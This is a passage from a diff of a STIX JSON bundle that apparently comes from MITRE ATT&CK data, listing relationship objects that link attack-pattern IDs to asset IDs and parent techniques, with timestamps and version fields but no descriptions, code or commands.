"attack-pattern--1cec9319-743b-4840-bb65-431547bce82a", + "target_ref": "attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b325fa79-1e26-49e3-8444-a7a69688cdff", + "created": "2024-06-21T14:12:20.267Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.267Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b33b8627-f139-4516-a53c-a37b271c7506", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c63a348e-ffc2-486a-b9d9-d7f11ec54d99", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b33f2abc-a218-425b-9a90-b75445b7e142", + "created": "2023-09-29T18:05:51.795Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:05:51.795Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b352884f-2a60-41c6-b348-0bbb5859802a", + "created": "2023-09-28T20:01:52.459Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:01:52.459Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b368055d-c2e7-4156-8f88-180d666f6966", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b373a7d7-84fe-4d88-8440-4b2a0d86de0c", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b37844c1-0338-44f6-9116-48fa0f079913", + "created": "2023-09-29T17:41:11.611Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:41:11.611Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b37b128a-aefc-4b40-9d2a-c213d7b29b43", + "created": "2020-02-14T13:35:33.221Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a", + "target_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b3983e19-98b7-454b-af18-068a3aee6afd", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c41090b-aa47-4331-986b-8c9a51a91103", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b39aeb68-580e-4dc6-b1d2-26833260f74c", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--86a96bf6-cf8b-411c-aaeb-8959944d64f7", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b3a48230-c750-40f7-b482-0c4a90bd21dc", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b3aab26c-09c6-4264-af2a-5df260d3d8e2", + "created": "2023-09-28T19:48:58.160Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:48:58.160Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b3b87c0d-00a6-4fee-a94b-8db68f8bfb6c", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b3eb1214-2382-471a-a0af-cd6e39bd4e35", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b3f594ea-5b13-4830-b6d1-36fd2248fef1", + "created": "2024-06-25T13:23:18.442Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-25T13:23:18.442Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b41050ac-7721-493a-8c59-f2e5e2d2f736", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b411f748-a1e9-40c6-8eb3-72f2de4dab08", + "created": "2023-09-28T20:02:20.170Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:02:20.170Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b43c3faa-c9cd-4fbc-8c87-a3c1a8d6fb7e", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b440b819-b23d-4c5a-a2a3-3c4c85e15d5e", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b44ce8ea-0e9f-481a-801d-86ca3d7089cf", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b4b4c873-3a4a-4bd1-adc2-631c02ddd91c", + "created": "2020-01-14T01:33:19.154Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f", + "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b4bb8bd7-8984-45de-888f-45c51ab157fa", + "created": "2023-09-29T17:45:55.581Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:45:55.581Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b4bff800-f33a-472c-9000-23fa217aac69", + "created": "2020-03-30T03:09:45.501Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b4c7df58-01cc-4d8e-8fac-6971fe3cf8da", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b4d72a2b-60c9-4266-800c-c751364b2614", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b5002fe6-56fa-4e7f-81b8-ddb7eb057772", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b52250ec-b832-498c-b9d4-47ec71abe927", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b5361ef4-c1cb-4d01-a1a6-de422c49faf8", + "created": "2024-06-26T19:26:11.812Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T19:26:11.812Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b54acdb9-af32-4e79-b197-8e931c33e043", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b54dd734-7d12-4f69-89f7-d89e9090777a", + "created": "2020-10-01T02:11:47.282Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--e7cbc1de-1f79-48ee-abfd-da1241c65a15", + "target_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b5861be0-0e07-4c95-b778-5ba65ee409e2", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b5963cc5-0488-46a8-b47a-b781ac724590", + "created": "2019-12-13T16:46:19.048Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", + "target_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b59a96e4-bd70-4459-9609-66563bccd9c3", + "created": "2023-09-29T16:38:21.688Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:38:21.688Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b5a017cc-1787-40eb-a091-6400c287a291", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eb897572-8979-4242-a089-56f294f4c91d", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b5b98b15-24b8-4a41-ad19-1061d08c2db7", + "created": "2024-06-26T13:52:23.775Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:52:23.775Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b5c3cd3d-e4f9-4a4e-9903-0c3ef632b3d4", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b5ca2ebe-1e0e-4ff8-ab2d-69207d605b30", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b5d102f3-2250-44b1-b08a-e5d8bb3d9033", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + 